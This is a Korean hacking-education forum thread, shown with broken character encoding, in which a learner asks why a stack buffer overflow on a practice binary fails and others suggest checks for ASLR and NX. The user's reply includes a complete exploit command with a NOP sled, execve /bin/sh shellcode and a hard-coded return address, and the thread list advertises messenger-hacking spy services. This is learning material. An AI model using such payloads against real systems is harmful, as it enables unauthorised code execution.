½Ã½ºÅÛ ÇØÅ·

 1574, 8/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   vngkv123
   64ºñÆ® bof°ü·ÃÁú¹®

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1836 [º¹»ç]


64ºñÆ®¿¡¼­ 32ºñÆ®ÄÄÆÄÀÏÇÑ ÆÄÀÏ¿¡ °£´ÜÇÑ bof¸¦ ÇÒ·Á´Âµ¥ aslrÀ̳ª nx°°Àº°Ç ÀüÇô ¾È°É·ÁÀÖ¾î¿ä. ¹öÆÛ¿¡ ½©Äڵ带 ³Ö°í ¸®ÅÏÁÖ¼Ò¸¦ ¹öÆÛ½ÃÀÛÁÖ¼Ò·Î µÎ°í Çϴµ¥ ÀüÇô ¸ÔÈ÷Áú¾Ê³×¿ä ¤Ð

±Ã±ÝÇÑ°Ô ÀÌ·² ¶§ 32ºñÆ®½©Äڵ带 ¾²´Ï¿ä 64ºñÆ®¸¦ ¾²³ª¿ä. ±×¸®°í ½ºÅÃùÁÖ¼Ò°¡ 32ºñÆ®ÄÄÆÄÀÏ ½Ã 0xff·Î ½ÃÀÛÇÏ´øµ¥ \xff°¡ ¹®Á¦°¡µÇ³ª¿ä??

  Hit : 2640     Date : 2017/03/28 09:01



    
ÇØÄð·¯ 32ºñÆ® ½©ÄÚµå ¾²±¸¿ä 0xff·Î ½ÃÀÛÇϴ°͵µ ¹®Á¦°¡ ¾ÈµË´Ï´Ù
aslr°ú nx°¡ ¸ðµÎ ¾ø´Â°Ô ¾Æ´Ò ¼ö Àִµ¥
cat /proc/sys/kernel/randomize_va_space ÇßÀ» ¶§ 0ÀÌ ³ª¿Í¾ß ÇÏ°í
http://www.trapkit.de/tools/checksec.html
ÀÌ°É·Î checksec.sh --file ./binary ÇßÀ» ¶§ NX Disabled°¡ ³ª¿Í¾ß ÇÕ´Ï´Ù
2017/03/28  
vngkv123 0x0804850a <+47>: lea eax,[ebp-0x48]
0x0804850d <+50>: push eax
0x0804850e <+51>: call 0x8048380 <strcpy@plt>

ÀÌ·¸°Ô 72¹ÙÀÌÆ® + 4¹ÙÀÌÆ® sfp + 4¹ÙÀÌÆ® retÀÌ Àִµ¥..

0xffffd560: 0x41414141 ¹öÆÛÀÇ ½ÃÀÛÁÖ¼Ò°¡ ÀÌ·¸°í Æä1À̷ε带

./exploitme `python -c 'print"\x90"*27+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x90"*26+"\x60\xd5\xff\xff"'` 23¹ÙÀÌÆ® ½©Äڵ带 ½á¼­ ³Ö¾ú´Âµ¥ ¾ÈµÇ³×¿ë ¤Ð

checksec.shÀ̶û aslrüũ½Ã NX¶û ¸Þ¸ð¸®·£´ýÈ­´Â ¾ø¾ú¾î¿µ
2017/03/28  
ÇØÄð·¯ ÀÏ´Ü ¶Ç ÀüÇüÀûÀÎ ¹®Á¦·Î º¸À̴µ¥ exploitme¸¦ »ó´ë°æ·Î°¡ ¾Æ´Ñ Àý´ë°æ·Î·Î ³Ö°í ½ÇÇàÇغ¸¼¼¿ä
±×¸®°í ¹öÆÛ ½ÃÀÛÁÖ¼Ò¸¦ gdb·Î ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄѼ­ ãÁö ¸¶½Ã°í eip¸¦ 0x41414141·Î º¯Á¶½ÃÄÑ ÄÚ¾îÆÄÀÏÀ» ¸¸µé°í ³ª¼­ È®ÀÎÇغ¸¼¼¿ä
2017/03/29  
1434   °í¼ö´Ôµé²² Áú¹®ÇÕ´Ï´Ù.[2]     pwnnnt
03/30 2210
  64ºñÆ® bof°ü·ÃÁú¹®[3]     vngkv123
03/28 2639
1432   ROP GOT overwriteÀÇ strcpyÁú¹®.. lob fedora hell_fire[6]     vngkv123
03/26 2330
1431   RTL±â¹ý Áú¹®[6]     vngkv123
03/23 2307
1430   µµ¿ÍÁÖ¼¼¿ä ´ëÇб³¼ö´ÔµéÇÑÅ× ¹°¾îºÁµµ ÀÌ»óÇÏ°Ô ´äº¯ÇØÁÖ¼¼¿ä ¤Ð.[1]     morieye
03/14 2240
1429   ¶óÀ̺귯¸®ÆÄÀÏ »ç¿ë[1]     exqa123
02/05 2586
1428   FC10 1¹ø¹®Á¦     exqa123
01/24 2304
1427   shellcode Áú¹®µå¸³´Ï´Ù.[1]     bong93
01/07 2191
1426   socat, µð¹ö±ë[3]     choboKing
12/31 2450
1425   32ºñÆ® ¸®´ª½º ¸ÅÁ÷°¡Á¬[2]     choboKing
12/31 3697
1424   peda context view ¿À·ù[2]     choboKing
12/22 2829
1423   ¶óÀ̺귯¸® ÇÔ¼öÀÇ ÁÖ¼Ò°¡ ÀÌ»óÇØ¿ä[codegate2014 nuclear][4]     choboKing
12/17 2995
1422   __libc_start_main¿¡ ´ëÇØ ¿©Â庾´Ï´Ù.[2]     choboKing
12/14 2732
1421   ½© Äڵ带 ¹è¿ì°í½ÍÀºµ¥ ¾î¶²Áö½ÄÀÌÀÖ¾î¾ßÇϳª¿ä?[4]     morieye
12/14 2402
1420   Ä«Åå ÆäÅå ÇØÅ·,Ä«Åå³»¿ªÁ¶È¸,Ä«ÅåÇØÅ·,»èÁ¦ÇÑÄ«Åå³»¿ªº¹±¸,½ºÆÄÀ̾Û,     wlslwlstm
11/25 3505
1419   °øÀ¯¶óÀ̺귯¸®¿¡ ´ëÇØ ¿©Â庾´Ï´Ù.     iwonderhow
10/07 2372
1418   ¾Ç¼ºÄÚµå ºÐ¼®...[1]     dreadlo
09/27 2876
1417   dllÀÎÁ§¼ÇÀÌ ¿Ö ¾ÈµÇ´Â °É±î¿ä....     wlgns5721
08/30 2745
1416   ÇØÅ·/µðµµ½º/¹é½Å¿ìȸÂÊ °°ÀÌ ¿¬±¸ÇϽø鼭 ¼ºÀåÇϽǺР±¸ÇÕ´Ï´Ù. Áö½Ä¾ø¾îµµµÊ [2]     yoyo1234
08/21 3230
1415   ÈÞ´ëÆù ÇØÅ·(?) ÀÌ°Å ¾î¶² ÇØÅ· Àΰ¡¿ä?[1]     ks610126
07/17 2937
[1][2][3][4][5][6][7] 8 [9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org